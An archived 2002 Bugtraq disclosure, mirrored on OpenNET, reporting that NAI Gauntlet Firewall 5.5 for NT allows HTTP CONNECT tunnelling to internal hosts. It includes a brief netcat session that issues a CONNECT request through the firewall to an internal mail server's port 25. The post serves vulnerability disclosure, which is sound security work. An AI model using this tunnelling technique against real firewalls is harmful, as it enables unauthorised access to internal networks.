The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 28 Feb 2002 18:33:26 +0400
From: Rashed Alabbar <rashed.alabbar@datafort.net.>
To: [email protected]
Subject: NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)

Hi all,

    I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.


I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)

Examples: (I'm using Volker Tanger [[email protected]]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0

HTTP/1.0 200 OK

mail server banner


That's it!


Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email:   [email protected]
http://www.datafort.net
_______________________________________________
The preceding E-mail message contains information that is confidential,
may be protected by the attorney-client or other applicable privileges,
and may constitute non-public information, which is intended to be
conveyed only to the designated recipients (s). If you are not an
intended recipient of this message, please notify the sender at (+9714)
391 3040 or via same e-mail. Unauthorized use, dissemination,
distribution, or reproduction of this message is strictly prohibited and
may be unlawful. Internet communications cannot be guaranteed to be
secured or error-free as information could be intercepted, corrupted,
lost, arrive late or contain viruses. The sender therefore does not
accept liability for any errors or omissions in the context of this
message which arise as a result of Internet transmission.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру